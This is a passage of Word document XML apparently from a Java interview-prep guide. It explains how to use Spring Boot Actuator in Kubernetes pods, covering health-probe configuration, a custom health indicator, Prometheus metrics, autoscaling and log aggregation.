      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fetch strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>projections</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enhance performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79437731" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By leveraging these techniques, you can handle complex queries in Spring Data JPA while ensuring efficiency and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA54BF4" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00000000" w:rsidP="00187C12">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6CAE3AFA">
          <v:rect id="_x0000_i2883" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FA86E" w14:textId="7569535B" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00414D65" w:rsidP="00686558">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="699" w:name="_Toc197867913"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you efficiently utilised the Spring Boot Actuators in PODs with health metrics in operation and management and modifying your microservices</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="699"/>
    </w:p>
    <w:p w14:paraId="7B65FE68" w14:textId="66FB24FE" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00FD7D9D" w:rsidP="00D516B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuators</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes Pods</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential for managing microservices health, performance, and monitoring in production environments. Spring Boot Actuators provide out-of-the-box features for health checks, metrics, application info, environment properties, and more. Here's how you can utilize Spring Boot Actuators effectively in Pods for operations, management, and microservice modifications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDDE89"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1. Enable and Configure Spring Boot Actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AEDFE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First, make sure you have the necessary dependencies in your pom.xml or build.gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D041E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For Maven (pom.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C784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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20362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lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB677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lt;artifactId&gt;spring-boot-starter-actuator&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E0C0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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FB49F"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For Gradle (build.gradle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330EFF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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772783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mplementation 'org.springframework.boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79940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4C30CDC7"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2. Expose Endpoints for Kubernetes Readiness and Liveness Probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07531A3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Spring Boot Actuator provides health endpoints, which can be exposed and leveraged by Kubernetes for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readines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liveness</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> probes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20ADE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Liveness Probe</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the application is alive and running. If the probe fails, Kubernetes will restart the pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC6A8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Readiness Probe</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the application is ready to serve traffic. If it fails, Kubernetes will stop sending traffic to the pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414FC7A9"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lastRenderedPageBreak/>
        <w:t>Configure Health Endpoint Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB79B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In application.properties or application.yml, enable and customize the actuator endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969E4E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health,info,metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E85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how-details=always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DFB8D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tatus.http-mapping.UP=200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC26F0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health.status.http-mapping.DOWN=503</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B8EA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health.livenessState.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D893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health.readinessState.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055510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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71F61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livenessProbe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBA37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httpGet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB839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ath: /actuator/health/liveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3425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ort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05F12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nitialDelaySeconds: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5802542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eriodSeconds: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63C305" w14:textId="77777777" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00FD7D9D" w:rsidP="00FD7D9D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3D890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readinessProbe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BDE4A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httpGet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FA773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ath: /actuator/health/readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD80C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ort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08024AC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nitialDelaySeconds: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB912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eriodSeconds: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB7AD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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>livenes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readiness</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> probes are mapped to the Spring Boot actuator's health endpoint. Ensure these probes are correctly configured in your Kubernetes deployment YAML for monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4CB31"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5969E">
          <v:rect id="_x0000_i2884" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66141A7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3. Custom Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C478D2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If you need to monitor more than just the default health status (e.g., database, custom services), Spring Boot allows you to create custom health checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF4080"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A49D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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF80B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public class CustomHealthIndicator implements HealthIndicator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88DA00" w14:textId="77777777" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00FD7D9D" w:rsidP="00FD7D9D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1FE15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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15321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ublic Health health() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E300BA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if (someServiceIsDown()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CCBD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Health.down().withDetail("Custom Service", "Service is down").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64780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385C9F1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Health.up().build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545048A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27007FA5" w14:textId="77777777" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00FD7D9D" w:rsidP="00FD7D9D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592DA74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private boolean someServiceIsDown() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776E31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Logic to check the health of the custom service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3188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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701338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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7422DA9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7828F28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Custom health indicators</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be created to monitor specific components or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED01E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ese will appear under the /actuator/health endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DF0AE"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C0072F">
          <v:rect id="_x0000_i2885" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B6F1D2"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4. Metrics for Monitoring and Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967B80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Actuators provide valuable metrics out of the box (e.g., JVM memory, CPU usage, request counts, and more). You can expose these metrics in a Prometheus-compatible format for consumption and scaling purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B55AC"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nable Metrics Exposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE26BF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metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554E3A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metrics.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF7B4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metrics.export.prometheus.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B19304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metrics.export.prometheus.scrape-interval=5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505EEE3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lastRenderedPageBreak/>
        <w:t>Prometheus Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: By enabling Prometheus metrics, Spring Boot Actuator provides out-of-the-box support to expose data in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus format</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Kubernetes can scrape this data, enabling you to monitor the application's resource usage and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E476B6"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08378">
          <v:rect id="_x0000_i2886" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB04B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5. Integration with Kubernetes for Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE0260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Use Kubernetes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Horizontal Pod Autoscaler (HPA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to automatically scale the number of pods based on CPU or custom metrics (such as request count, response time, or memory usage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64200D6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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuator's metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Prometheus to gather custom metrics such as the number of requests, latency, etc., and feed this data into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes HPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAECBA3"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Kubernetes HPA for Custom Metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6EDE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apiVersion: autoscaling/v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2826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kind: HorizontalPodAutoscaler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71731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etadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58689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my-app-hpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0FD5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space: default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F2B01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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A4DE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scaleTargetRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A7D5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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1856585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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387686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my-app-deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE1C9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etrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C153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type: External</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6AD9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external:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045DF55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etric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AA82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name: http_requests_total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31E94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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF7EC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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B40138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app: my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439FD75"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target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBD3C0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type: Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B5DB0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value: "1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A04B4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Here, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http_requests_total</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a custom metric that could be scraped via </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and used by the HPA to scale the pods based on incoming traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40748AF4"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073ED">
          <v:rect id="_x0000_i2887" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52039A4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6. Log Aggregation and Monitoring with Spring Boot Actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42048F"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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuator's loggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and integrate with centralized logging solutions like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK (Elasticsearch, Logstash, Kibana)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fluentd</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Kubernetes can manage logs at the pod level, but aggregating them using these tools helps in tracing and debugging in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B5C454"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Loggers Configuration:</w:t>
      </w:r>
